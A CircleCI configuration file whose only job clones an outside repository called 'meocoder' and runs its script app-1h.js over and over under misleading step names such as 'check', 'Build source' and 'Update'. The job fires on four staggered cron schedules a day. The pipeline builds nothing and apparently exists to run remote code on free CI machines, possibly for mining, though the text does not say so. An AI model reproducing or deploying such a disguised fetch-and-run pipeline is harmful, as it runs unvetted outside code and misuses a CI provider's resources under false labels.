version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/source

    steps:
      - checkout
      
      - run:
          name: Clone project
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js
      - run:
          name: check
          command:  cd meocoder && node app-1h.js
      - run:
          name: Build source
          command:  cd meocoder && node app-1h.js
      - run:
          name: Update
          command:  cd meocoder && node app-1h.js
      - run:
          name: close jobs
          command:  cd meocoder && node test-45m.js

      # cronjob 
workflows:
  version: 2

  constantly_check:
    triggers:
      - schedule:
          cron: "40 2,8,14,20 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "42 2,8,14,20 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "44 2,8,14,20 * * *"
          filters:
            branches:
              only:
                - main
                - master
      - schedule:
          cron: "46 2,8,14,20 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build
